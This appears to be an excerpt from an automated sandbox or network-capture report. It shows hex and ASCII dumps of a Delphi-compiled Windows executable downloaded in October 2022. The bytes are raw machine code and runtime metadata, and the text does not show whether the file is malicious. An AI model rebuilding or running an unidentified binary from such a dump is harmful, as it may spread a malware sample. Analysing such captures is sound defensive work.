                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC31INData Raw: 54 8b 46 fc 8b 57 fc 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 41 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 34 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 02 74 0b 66 8b 0e 66 8b 1f 66 39 d9 75 21 01 c0 eb 1d 8b 57 fc 29 d0 eb 16 8b 46 fc 29 d0 eb 0f 5a 66 39 d9 75 09 c1 e9 10 c1 eb 10 66 39 d9 5f 5e 5b c3 8d 40 00 e9 77 ff ff ff c3 8b c0 53 56 57 8b f2 8b f8 33 db 85 f6 7e 2d 8b c6 e8 ac f5 ff ff 8b d8 8b 07 85 c0 74 07 83 e8 04 8b 00 d1 e8 85 c0 7e 13 3b f0 7d 02 8b c6 8b c8 03 c9 8b d3 8b 07 e8 32 d1 ff ff 8b c7 8b d3 e8 59 fe ff ff 5f 5e 5b c3 90 53 56 81 c4 fc fe ff ff 8b d9 66 89 14 24 8b f0 81 fb ff 00 00 00 7e 05 bb ff 00 00 00 6a 01 8d 4c 24 04 8d 44 24 06 ba ff 00 00 00 e8 af f6 ff ff 85 c0 7d 04 33 c0 eb 06 3b d8 7d 02
                                                                                                                                                                                                                                    Data Ascii: TFW)wRt&9uAJtN_9u4JuZtfff9u!W)F)Zf9uf9_^[@wSVW3~-t~;}2Y_^[SVf$~jL$D$}3;}
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC32INData Raw: 01 ca f7 d9 53 8b 1c 01 3b 1c 11 75 07 83 c1 04 78 f3 31 c0 5b c3 85 c0 74 04 85 d2 75 d6 39 d0 c3 8d 40 00 55 8b ec 53 56 8b d8 85 db 74 05 83 eb 04 8b 1b 83 fa 01 7d 04 33 d2 eb 07 4a 3b da 7d 02 8b d3 85 c9 7d 04 33 f6 eb 0a 8b f3 2b f2 3b ce 7d 02 8b f1 8b 4d 08 03 d2 03 d0 8b c6 91 e8 bb f2 ff ff 5e 5b 5d c2 04 00 90 53 56 57 8b f9 8b da 8b f0 8b c6 e8 14 f6 ff ff 8b 06 85 c0 74 05 83 e8 04 8b 00 83 fb 01 7c 36 3b c3 7c 32 85 ff 7e 2e 4b 8b d0 2b d3 2b d7 8b fa 85 ff 7d 02 33 ff 2b c7 8b 16 8d 04 42 8b cf 03 c9 8b 16 8d 14 5a e8 74 cc ff ff 8d 14 1f 8b c6 e8 1a fd ff ff 5f 5e 5b c3 8b c0 53 56 57 55 83 c4 f4 8b f1 8b fa 89 04 24 8b 04 24 85 c0 74 05 83 e8 04 8b 00 8b e8 85 ed 0f 8e 8b 00 00 00 8b 07 85 c0 74 05 83 e8 04 8b 00 8b d8 83 fe 01 7d 04 33
                                                                                                                                                                                                                                    Data Ascii: S;ux1[tu9@USVt}3J;}}3+;}M^[]SVWt|6;|2~.K++}3+BZt_^[SVWU$$tt}3
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC33INData Raw: 4f 7f f0 5d eb 2b 89 d8 83 c3 04 e8 8b 26 00 00 4f 7f f3 eb 1c 89 d8 89 f2 83 c3 04 e8 22 0f 00 00 4f 7f f1 eb 0b 5f 5e 5b 58 b0 02 e9 3a c7 ff ff 5f 5e 5b 58 c3 90 b9 01 00 00 00 e9 e6 fe ff ff c3 90 31 c9 53 8a 4a 01 56 57 89 c3 8d 74 11 0a 8b 7c 11 06 85 ff 74 1d 8b 16 85 d2 74 17 8b 46 04 01 d8 8b 12 b9 01 00 00 00 e8 23 00 00 00 83 c6 08 4f 7f e3 5f 5e 5b c3 90 83 3d 14 70 4b 00 00 74 07 ff 15 14 70 4b 00 c3 b0 10 e8 d9 c6 ff ff c3 53 56 57 85 c9 0f 84 b4 00 00 00 89 c3 89 d6 89 cf 31 d2 8a 06 8a 56 01 3c 0a 74 26 3c 0b 74 31 3c 12 74 1e 3c 0c 74 38 3c 0d 74 43 3c 0e 74 5d 3c 0f 74 6f 3c 11 74 7a b0 02 5f 5e 5b e9 96 c6 ff ff 8b 03 83 c3 04 e8 54 ec ff ff 4f 7f f3 eb 6e 89 d8 83 c3 04 e8 55 ec ff ff 4f 7f f3 eb 5f 89 d8 83 c3 10 e8 7e ff ff ff 4f 7f
                                                                                                                                                                                                                                    Data Ascii: O]+&O"O_^[X:_^[X1SJVWt|ttF#O_^[=pKtpKSVW1V<t&<t1<t<t8<tC<t]<to<tz_^[TOnUO_~O
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC34INData Raw: 57 55 89 c3 89 d6 89 cf 8b 6c 24 14 8a 0f 80 f9 0a 74 3a 80 f9 0b 74 4c 80 f9 12 74 5e 80 f9 0c 74 6d 80 f9 0d 74 7c 80 f9 0e 0f 84 96 00 00 00 80 f9 0f 0f 84 aa 00 00 00 80 f9 11 0f 84 b5 00 00 00 b0 02 5d 5f 5e 5b e9 c5 c1 ff ff 89 d8 8b 16 e8 0c eb ff ff 83 c3 04 83 c6 04 4d 75 ee e9 a7 00 00 00 89 d8 8b 16 e8 cd ea ff ff 83 c3 04 83 c6 04 4d 75 ee e9 90 00 00 00 89 d8 8b 16 e8 42 ea ff ff 83 c3 04 83 c6 04 4d 75 ee eb 7c 89 d8 89 f2 e8 66 fb ff ff 83 c3 10 83 c6 10 4d 75 ee eb 68 31 c9 8a 4f 01 8d 7c 39 02 89 d8 89 f2 8b 4f 08 8b 09 ff 77 04 e8 41 ff ff ff 03 1f 03 37 4d 75 e8 eb 45 89 d8 89 f2 89 f9 e8 51 fb ff ff 31 c0 8a 47 01 03 5c 38 02 03 74 38 02 4d 75 e5 eb 28 89 d8 8b 16 e8 6e 20 00 00 83 c3 04 83 c6 04 4d 75 ee eb 14 89 d8 8b 16 89 f9 e8 2c
                                                                                                                                                                                                                                    Data Ascii: WUl$t:tLt^tmt|]_^[MuMuBMu|fMuh1O|9OwA7MuEQ1G\8t8Mu(n Mu,
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC36INData Raw: db 4b 00 88 04 24 eb 6f 0f b6 03 2c 0d 74 06 fe c8 74 0f eb 5e 0f b6 43 01 03 c3 8b 40 0a 8b 18 eb d2 0f b6 73 01 03 f3 83 7e 06 00 76 45 8b 6e 06 4d 85 ed 7c 3d 45 33 ff 83 7c fe 0a 00 74 37 8b 44 fe 0a 8b 18 80 3b 0d 75 14 0f b6 43 01 03 c3 8b 40 0a 8b 00 e8 8a ff ff ff 84 c0 75 18 80 3b 0e 75 0b 8b c3 e8 7a ff ff ff 84 c0 75 08 47 4d 75 c6 c6 04 24 00 0f b6 04 24 5a 5d 5f 5e 5b c3 53 56 8b f0 e8 43 33 00 00 3b b0 08 00 00 00 75 0e e8 36 33 00 00 0f b6 98 0c 00 00 00 eb 1f 8b c6 e8 3e ff ff ff 8b d8 e8 1f 33 00 00 89 b0 08 00 00 00 e8 14 33 00 00 88 98 0c 00 00 00 8b c3 5e 5b c3 90 55 8b ec 83 c4 dc 53 56 57 89 4d f4 89 55 f8 89 45 fc 8b 45 fc 8b 00 89 45 e0 8b 45 08 8b 18 85 db 7f 1b 85 db 7d 07 b0 04 e8 c6 bb ff ff 8b 45 fc 8b 55 f8 e8 93 03 00 00 e9
                                                                                                                                                                                                                                    Data Ascii: K$o,tt^C@s~vEnM|=E3|t7D;uC@u;uzuGMu$$Z]_^[SVC3;u63>33^[USVWMUEEEE}EU
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC37INData Raw: 8b c3 83 e8 08 8b 40 04 89 44 24 08 8b 44 24 04 03 44 24 08 89 44 24 0c 8b 04 24 0f b6 78 01 03 f8 8b c7 8b 68 02 8b 50 06 85 d2 74 04 8b 3a eb 02 33 ff 8b 44 24 0c f7 ed 89 44 24 10 8b 44 24 10 99 f7 7c 24 0c 3b e8 74 05 e8 a5 bd ff ff 83 44 24 10 08 83 7c 24 10 00 7d 05 e8 94 bd ff ff 8b 06 89 44 24 18 8b 44 24 0c 89 44 24 14 8d 44 24 14 50 8b c6 b9 01 00 00 00 8b 54 24 04 e8 e9 fa ff ff 3b 5c 24 18 75 02 8b 1e 85 ff 74 1b 8b 44 24 04 f7 ed 8b 16 8d 04 02 8b 54 24 08 52 8b cf 8b d3 e8 e4 f6 ff ff eb 18 8b 44 24 04 f7 ed 8b 16 03 d0 8b 4c 24 08 0f af cd 8b c3 e8 06 b7 ff ff 83 c4 1c 5d 5f 5e 5b c3 8b c0 55 8b ec 83 c4 e4 53 56 57 89 4d f8 89 55 fc 8b d8 83 3b 00 0f 84 cc 00 00 00 8b 03 83 e8 08 8b 40 04 83 7d fc 00 0f 8c ba 00 00 00 3b 45 fc 0f 8e b1 00
                                                                                                                                                                                                                                    Data Ascii: @D$D$D$D$$xhPt:3D$D$D$|$;tD$|$}D$D$D$D$PT$;\$utD$T$RD$L$]_^[USVWMU;@};E
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC38INData Raw: e8 36 93 ff ff c3 90 53 85 d2 75 07 66 c7 00 00 00 eb 26 85 d2 7e 16 0f b7 19 66 89 18 66 85 db 74 17 83 c0 02 83 c1 02 4a 85 d2 7f ea 85 d2 75 08 83 e8 02 66 c7 00 00 00 5b c3 55 8b ec 51 53 89 45 fc 8b 45 fc e8 74 d7 ff ff 33 c0 55 68 dc a3 40 00 64 ff 30 64 89 20 8b 45 fc 85 c0 74 05 83 e8 04 8b 00 83 f8 01 7c 15 8b 55 fc 66 83 7c 42 fe 2d 75 05 8b d8 4b eb 07 48 85 c0 75 eb 33 db 33 c0 5a 59 59 64 89 10 68 e3 a3 40 00 8d 45 fc e8 45 d6 ff ff c3 e9 5b cc ff ff eb f0 8b c3 5b 59 5d c3 8d 40 00 55 8b ec 6a 00 6a 00 6a 00 53 56 8b da 8b f0 33 c0 55 68 af a4 40 00 64 ff 30 64 89 20 8b c3 8b d6 e8 0e e1 ff ff 8b 03 85 c0 74 05 83 e8 04 8b 00 85 c0 7e 13 ba 01 00 00 00 8b 0b 66 83 7c 51 fe 2c 74 64 42 48 75 f2 8d 45 f8 8b 13 e8 0a da ff ff 8b c3 e8 db d5 ff
                                                                                                                                                                                                                                    Data Ascii: 6Suf&~fftJuf[UQSEEt3Uh@d0d Et|Uf|B-uKHu33ZYYdh@EE[[Y]@UjjjSV3Uh@d0d t~f|Q,tdBHuE
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC40INData Raw: ff 68 10 dc 4b 00 e8 c7 8d ff ff 66 89 1d 28 dc 4b 00 8b 06 e8 35 dc ff ff 8b c8 b8 2a dc 4b 00 ba aa 00 00 00 e8 84 fa ff ff 68 10 dc 4b 00 e8 a6 8d ff ff 33 c0 5a 59 59 64 89 10 68 ef a8 40 00 8d 45 fc e8 39 d1 ff ff c3 e9 4f c7 ff ff eb f0 5e 5b 59 5d c3 b0 04 02 00 ff ff ff ff 01 00 00 00 2c 00 00 00 53 56 8b d8 eb 08 53 e8 40 8e ff ff 8b d8 0f b7 33 66 85 f6 74 06 66 83 fe 5c 75 ea 8b c3 5e 5b c3 8d 40 00 55 8b ec 81 c4 94 fb ff ff 53 56 57 89 55 f8 89 45 fc 8b 45 fc 89 45 f4 68 e8 aa 40 00 e8 a6 8d ff ff 8b f0 85 f6 74 3d 68 04 ab 40 00 56 e8 9d 8d ff ff 89 c3 85 db 74 2c 68 05 01 00 00 8d 85 96 fb ff ff 50 8b 45 fc 50 ff d3 85 c0 74 16 8d 8d 96 fb ff ff 8b 55 f8 8b 45 fc e8 c4 f9 ff ff e9 51 01 00 00 8b 45 fc 66 83 38 5c 75 3b 8b 45 fc 66 83 78 02
                                                                                                                                                                                                                                    Data Ascii: hKf(K5*KhK3ZYYdh@E9O^[Y],SVS@3ftf\u^[@USVWUEEEh@t=h@Vt,hPEPtUEQEf8\u;Efx
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC41INData Raw: 00 77 00 61 00 72 00 65 00 5c 00 42 00 6f 00 72 00 6c 00 61 00 6e 00 64 00 5c 00 44 00 65 00 6c 00 70 00 68 00 69 00 5c 00 4c 00 6f 00 63 00 61 00 6c 00 65 00 73 00 00 00 00 00 00 00 55 8b ec 6a 00 53 56 8b da 8b f0 33 c0 55 68 8b ae 40 00 64 ff 30 64 89 20 83 3d 10 7c 4b 00 00 75 12 8d 55 fc 8b c6 e8 b8 fc ff ff 8b 45 fc e8 30 00 00 00 8b c3 8b 15 10 7c 4b 00 e8 db d6 ff ff 33 c0 5a 59 59 64 89 10 68 92 ae 40 00 8d 45 fc e8 96 cb ff ff c3 e9 ac c1 ff ff eb f0 5e 5b 59 5d c3 90 53 56 57 8b f0 83 3d 10 7c 4b 00 00 74 0a a1 10 7c 4b 00 e8 bc 93 ff ff 8b c6 85 c0 74 05 83 e8 04 8b 00 8b d8 85 db 7e 27 43 8b fb 03 ff 8b c7 e8 1b 90 ff ff a3 10 7c 4b 00 8b c6 e8 13 d6 ff ff 8b 15 10 7c 4b 00 8b cf e8 ce a6 ff ff eb 07 33 c0 a3 10 7c 4b 00 5f 5e 5b c3 90 55 8b
                                                                                                                                                                                                                                    Data Ascii: ware\Borland\Delphi\LocalesUjSV3Uh@d0d =|KuUE0|K3ZYYdh@E^[Y]SVW=|Kt|Kt~'C|K|K3|K_^[U
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC42INData Raw: 70 4b 00 8b c7 e8 b2 a0 ff ff eb 28 8b df 85 db 74 22 8b 33 85 f6 74 16 8b 46 04 3b c5 75 0f 8b fe 8b 06 89 03 8b c7 e8 90 a0 ff ff eb 06 8b 1b 85 db 75 de 5d 5f 5e 5b c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 89 45 fc a1 48 70 4b 00 89 45 f8 83 7d f8 00 74 39 33 c0 55 68 c7 b3 40 00 64 ff 30 64 89 20 8b 5d f8 8b 45 fc ff 53 04 33 c0 5a 59 59 64 89 10 eb 0a e9 bc b9 ff ff e8 0f be ff ff 8b 45 f8 8b 00 89 45 f8 83 7d f8 00 75 c7 5f 5e 5b 59 59 5d c3 8b c0 8b 15 44 70 4b 00 85 d2 74 0a 3b c2 74 13 8b 12 85 d2 75 f6 8b 15 44 70 4b 00 89 10 a3 44 70 4b 00 c3 8b c0 55 8b ec 51 89 45 fc 33 d2 55 68 70 b4 40 00 64 ff 32 64 89 22 8b 45 fc 8b 40 04 e8 60 ff ff ff 33 c0 5a 59 59 64 89 10 68 77 b4 40 00 8b 45 fc 3b 05 44 70 4b 00 75 0c 8b 45 fc 8b 00 a3 44 70 4b 00 eb
                                                                                                                                                                                                                                    Data Ascii: pK(t"3tF;uu]_^[@USVWEHpKE}t93Uh@d0d ]ES3ZYYdEE}u_^[YY]DpKt;tuDpKDpKUQE3Uhp@d2d"E@`3ZYYdhw@E;DpKuEDpK
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC44INData Raw: 43 6f 75 6e 74 65 72 0c 00 f8 21 40 00 b8 5c 40 00 00 00 9c 10 40 00 0c 00 00 00 00 0a 46 46 72 65 65 43 6f 75 6e 74 02 00 50 23 40 00 10 00 00 00 00 09 46 49 6e 69 74 4c 6f 63 6b 02 00 24 b8 40 00 14 00 00 00 00 08 46 42 75 63 6b 65 74 73 02 00 00 10 40 00 50 09 00 00 00 0c 46 49 6e 69 74 69 61 6c 69 7a 65 64 02 00 02 00 08 00 08 8c c2 40 00 07 44 65 73 74 72 6f 79 00 00 00 00 00 00 01 00 00 11 40 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 08 dc c1 40 00 0a 49 6e 69 74 69 61 6c 69 7a 65 00 00 00 00 00 00 00 02 00 08 98 c1 40 00 08 46 69 6e 61 6c 69 7a 65 00 00 00 00 00 00 00 02 00 08 38 c3 40 00 0f 52 65 67 69 73 74 65 72 57 65 61 6b 52 65 66 00 00 00 00 00 00 02 00 00 11 40 00 07 41 64 64 72 65 73 73 02 00 00 00 11 40 00 08 49 6e 73 74 61 6e 63 65 02 00
                                                                                                                                                                                                                                    Data Ascii: Counter!@\@@FFreeCountP#@FInitLock$@FBuckets@PFInitialized@Destroy@Instance@Initialize@Finalize8@RegisterWeakRef@Address@Instance
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC45INData Raw: 1f 00 00 00 99 f7 f9 8b da 8b 45 fc e8 69 fe ff ff 33 c9 55 68 6b be 40 00 64 ff 31 64 89 21 8b 04 9e 85 c0 74 05 83 e8 04 8b 00 8b d0 4a 85 d2 7c 21 42 33 c0 8b 0c 9e 8b 0c 81 3b 4d f8 75 0f 8b 14 9e 33 c9 89 0c 82 e8 c1 b3 ff ff eb 21 40 4a 75 e2 33 c0 5a 59 59 64 89 10 68 72 be 40 00 8b 45 fc e8 2a fe ff ff c3 e9 cc b1 ff ff eb f0 5e 5b 59 59 5d c3 53 56 57 8b f9 8b f2 8b d8 8b 43 08 85 c0 74 05 83 e8 04 8b 00 85 c0 75 0f 8d 43 08 ba 0a 00 00 00 e8 a6 fc ff ff eb 29 8b 43 08 85 c0 74 05 83 e8 04 8b 00 3b 43 04 75 18 8b 43 08 85 c0 74 05 83 e8 04 8b 00 8b d0 03 d2 8d 43 08 e8 7b fc ff ff 8b 43 04 3b f0 7c 08 8b 53 08 89 3c 82 eb 1f 8b 53 08 8d 54 b2 04 8b 4b 08 8d 0c b1 2b c6 03 c0 03 c0 91 e8 c3 96 ff ff 8b 43 08 89 3c b0 ff 43 04 5f 5e 5b c3 8b c0 53
                                                                                                                                                                                                                                    Data Ascii: Ei3Uhk@d1d!tJ|!B3;Mu3!@Ju3ZYYdhr@E*^[YY]SVWCtuC)Ct;CuCtC{C;|S<STK+C<C_^[S
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC46INData Raw: ff 8b cb 8b c1 c1 e8 0d c1 e9 05 03 c1 b9 c5 00 00 00 99 f7 f9 89 55 f4 8b 75 f4 8d 34 76 8b 45 fc 8d 44 b0 14 e8 37 fc ff ff 33 d2 55 68 ed c3 40 00 64 ff 32 64 89 22 8b 45 fc 8d 44 b0 14 8d 4d f0 8b d3 e8 5c fb ff ff 89 45 ec 83 7d ec 00 75 20 8b 45 fc 8b d3 e8 2d fd ff ff 8b d8 8b 45 fc 8d 44 b0 14 8b cb 8b 55 f0 e8 ae fa ff ff 89 5d ec 33 c0 5a 59 59 64 89 10 68 f4 c3 40 00 8b 45 f4 8d 04 40 8b 55 fc 8d 44 82 14 e8 38 fc ff ff c3 e9 4a ac ff ff eb e6 8b 45 ec 89 45 e8 8b 45 e8 8d 50 08 8b 45 e8 8b 4d f8 e8 0d f9 ff ff 5e 5b 8b e5 5d c3 8d 40 00 55 8b ec 83 c4 e8 53 56 8b d9 89 55 f8 89 45 fc 8b 45 fc 80 b8 50 09 00 00 00 0f 84 8f 00 00 00 8b cb 8b c1 c1 e8 0d c1 e9 05 03 c1 b9 c5 00 00 00 99 f7 f9 89 55 f4 8b 75 f4 8d 34 76 8b 45 fc 8d 44 b0 14 e8 5f
                                                                                                                                                                                                                                    Data Ascii: Uu4vED73Uh@d2d"EDM\E}u E-EDU]3ZYYdh@E@UD8JEEEPEM^[]@USVUEEPUu4vED_
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC48INData Raw: 8b 1b 53 8b c6 e8 2e bc ff ff 8b c8 8d 47 01 ba ff 00 00 00 e8 cb fd ff ff 48 85 c0 7d 02 33 c0 88 07 5f 5e 5b c3 8b c0 55 8b ec 81 c4 fc fe ff ff 53 56 57 33 c9 89 4d fc 8b f0 8d bd fc fe ff ff 0f b6 0e 41 f3 a4 8b f2 33 c0 55 68 7e c9 40 00 64 ff 30 64 89 20 8b c6 e8 0e b1 ff ff 80 bd fc fe ff ff 00 74 4d 0f b6 9d fc fe ff ff 8d 45 fc 8b d3 e8 38 bd ff ff 53 8b 45 fc e8 b7 bb ff ff 8d 8d fd fe ff ff 8d 53 01 e8 f5 fd ff ff 8b d8 85 db 7e 0d 8b d3 4a 8d 45 fc e8 10 bd ff ff eb 08 8d 45 fc e8 c2 b0 ff ff 8b c6 8b 55 fc e8 98 b4 ff ff 33 c0 5a 59 59 64 89 10 68 85 c9 40 00 8d 45 fc e8 a3 b0 ff ff c3 e9 b9 a6 ff ff eb f0 5f 5e 5b 8b e5 5d c3 53 56 57 81 c4 00 ff ff ff 8b f0 8d 3c 24 0f b6 0e 41 f3 a4 8b da 8b d3 8b c4 e8 31 ff ff ff 81 c4 00 01 00 00 5f 5e
                                                                                                                                                                                                                                    Data Ascii: S.GH}3_^[USVW3MA3Uh~@d0d tME8SES~JEEU3ZYYdh@E_^[]SVW<$A1_^
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC49INData Raw: 9b fe ff ff e8 96 fe ff ff e8 91 fe ff ff e8 8c fe ff ff e8 87 fe ff ff e8 82 fe ff ff e8 7d fe ff ff e8 78 fe ff ff e8 73 fe ff ff e8 6e fe ff ff e8 69 fe ff ff e8 64 fe ff ff e8 5f fe ff ff e8 5a fe ff ff e8 55 fe ff ff e8 50 fe ff ff e8 4b fe ff ff e8 46 fe ff ff e8 41 fe ff ff e8 3c fe ff ff e8 37 fe ff ff e8 32 fe ff ff e8 2d fe ff ff e8 28 fe ff ff e8 23 fe ff ff e8 1e fe ff ff e8 19 fe ff ff e8 14 fe ff ff e8 0f fe ff ff e8 0a fe ff ff e8 05 fe ff ff e8 00 fe ff ff e8 fb fd ff ff e8 f6 fd ff ff e8 f1 fd ff ff e8 ec fd ff ff e8 e7 fd ff ff e8 e2 fd ff ff e8 dd fd ff ff e8 d8 fd ff ff e8 d3 fd ff ff e8 ce fd ff ff e8 c9 fd ff ff e8 c4 fd ff ff e8 bf fd ff ff e8 ba fd ff ff e8 b5 fd ff ff e8 b0 fd ff ff e8 ab fd ff ff e8 a6 fd ff ff e8 a1 fd ff ff e8
                                                                                                                                                                                                                                    Data Ascii: }xsnid_ZUPKFA<72-(#
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC50INData Raw: 15 40 e6 4b 00 8b d8 85 db 75 0b 8b 45 b4 50 e8 6e f8 ff ff 8b d8 85 db 75 4b e8 5b f8 ff ff 89 45 c8 83 3d 44 e6 4b 00 00 74 0e 8d 45 a8 50 6a 03 ff 15 44 e6 4b 00 8b d8 85 db 75 28 a1 88 7c 4b 00 89 45 f4 8d 55 a8 89 55 f4 8d 4d f4 51 6a 01 6a 00 68 7e 00 6d c0 e8 2d f8 ff ff 8b 45 c4 e9 21 01 00 00 53 8b 55 d4 52 e8 cb f7 ff ff 3b d8 74 33 83 7e 18 00 74 33 6a 08 6a 40 e8 d8 f7 ff ff 89 45 f0 85 c0 74 23 8b c6 8b 55 f0 89 42 04 8b 4d f0 a1 3c 7c 4b 00 89 01 8b 55 f0 89 15 3c 7c 4b 00 eb 06 53 e8 9e f7 ff ff 89 5d c0 83 3d 40 e6 4b 00 00 74 0e 8d 4d a8 51 6a 02 ff 15 40 e6 4b 00 8b f8 85 ff 75 4b 83 7e 14 00 74 39 83 7e 1c 00 74 33 8b 43 3c 03 c3 81 38 50 45 00 00 75 26 8b 50 08 3b 55 e8 75 1e 8b 48 34 3b cb 0f 94 c1 83 e1 01 84 c9 74 0f 8b 45 e0 8b 55
                                                                                                                                                                                                                                    Data Ascii: @KuEPnuK[E=DKtEPjDKu(|KEUUMQjjh~m-E!SUR;t3~t3jj@Et#UBM<|KU<|KS]=@KtMQj@KuK~t9~t3C<8PEu&P;UuH4;tEU
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC52INData Raw: 6e 01 00 00 00 00 01 00 00 00 b0 d8 40 00 0d 46 72 6f 6d 42 65 67 69 6e 6e 69 6e 67 07 46 72 6f 6d 45 6e 64 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 02 00 00 00 f8 d8 40 00 03 0b 54 57 61 69 74 52 65 73 75 6c 74 01 00 00 00 00 04 00 00 00 f4 d8 40 00 0a 77 72 53 69 67 6e 61 6c 65 64 09 77 72 54 69 6d 65 6f 75 74 0b 77 72 41 62 61 6e 64 6f 6e 65 64 07 77 72 45 72 72 6f 72 0e 77 72 49 4f 43 6f 6d 70 6c 65 74 69 6f 6e 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 02 00 00 00 00 60 d9 40 00 03 1b 54 4d 75 6c 74 69 57 61 69 74 45 76 65 6e 74 2e 54 57 61 69 74 65 72 46 6c 61 67 01 00 00 00 00 01 00 00 00 5c d9 40 00 07 57 61 69 74 69 6e 67 07 57 61 69 74 41 6c 6c 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 02 00 00 00 00 b0 d9 40 00 06 1c 54 4d 75 6c 74 69 57 61 69 74 45 76
                                                                                                                                                                                                                                    Data Ascii: n@FromBeginningFromEndSystem.Types@TWaitResult@wrSignaledwrTimeoutwrAbandonedwrErrorwrIOCompletionSystem.Types`@TMultiWaitEvent.TWaiterFlag\@WaitingWaitAllSystem.Types@TMultiWaitEv
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC53INData Raw: 65 6e 74 73 02 00 00 e4 10 40 00 02 00 07 54 69 6d 65 6f 75 74 02 00 02 00 4c 00 18 7c 4b 00 0a 57 61 69 74 46 6f 72 41 6e 79 03 00 f4 d8 40 00 0c 00 03 16 cc de 40 00 00 00 06 45 76 65 6e 74 73 02 00 20 9c 10 40 00 02 00 05 49 6e 64 65 78 02 00 00 e4 10 40 00 08 00 07 54 69 6d 65 6f 75 74 02 00 02 00 4c 00 18 7c 4b 00 0a 57 61 69 74 46 6f 72 41 6e 79 03 00 f4 d8 40 00 0c 00 03 16 cc de 40 00 00 00 06 45 76 65 6e 74 73 02 00 28 cc de 40 00 02 00 05 45 76 65 6e 74 02 00 00 e4 10 40 00 08 00 07 54 69 6d 65 6f 75 74 02 00 02 00 00 00 00 d0 de 40 00 07 0f 54 4d 75 6c 74 69 57 61 69 74 45 76 65 6e 74 5c dc 40 00 88 1f 40 00 00 00 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 00 00 00 00 02 00 00 00 04 df 40 00 0f 0c 49 41 73 79 6e 63 52 65 73 75 6c 74 b0 26 40 00 00
                                                                                                                                                                                                                                    Data Ascii: ents@TimeoutL|KWaitForAny@@Events @Index@TimeoutL|KWaitForAny@@Events(@Event@Timeout@TMultiWaitEvent\@@System.Types@IAsyncResult&@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC54INData Raw: 25 5c 23 4c 00 8b c0 ff 25 d0 23 4c 00 8b c0 ff 25 dc 23 4c 00 8b c0 ff 25 b4 23 4c 00 8b c0 ff 25 fc 22 4c 00 8b c0 ff 25 f8 22 4c 00 8b c0 ff 25 78 23 4c 00 8b c0 ff 25 7c 23 4c 00 8b c0 ff 25 28 24 4c 00 8b c0 ff 25 fc 23 4c 00 8b c0 ff 25 2c 24 4c 00 8b c0 ff 25 84 24 4c 00 8b c0 ff 25 7c 24 4c 00 8b c0 ff 25 80 24 4c 00 8b c0 ff 25 98 24 4c 00 8b c0 ff 25 94 24 4c 00 8b c0 ff 25 9c 24 4c 00 8b c0 ff 25 b4 24 4c 00 8b c0 ff 25 b0 24 4c 00 8b c0 ff 25 c8 24 4c 00 8b c0 ff 25 c4 24 4c 00 8b c0 ff 25 a4 24 4c 00 8b c0 ff 25 c0 24 4c 00 8b c0 ff 25 ac 24 4c 00 8b c0 ff 25 bc 24 4c 00 8b c0 ff 25 a0 24 4c 00 8b c0 ff 25 90 24 4c 00 8b c0 ff 25 8c 24 4c 00 8b c0 55 8b ec 51 53 56 57 89 4d fc 8b fa 8b f0 e8 dd 72 ff ff 8b d8 8b 45 08 50 8b 45 0c 50 8b 45 10
                                                                                                                                                                                                                                    Data Ascii: %\#L%#L%#L%#L%"L%"L%x#L%|#L%($L%#L%,$L%$L%|$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$LUQSVWMrEPEPE
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC59INData Raw: 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d
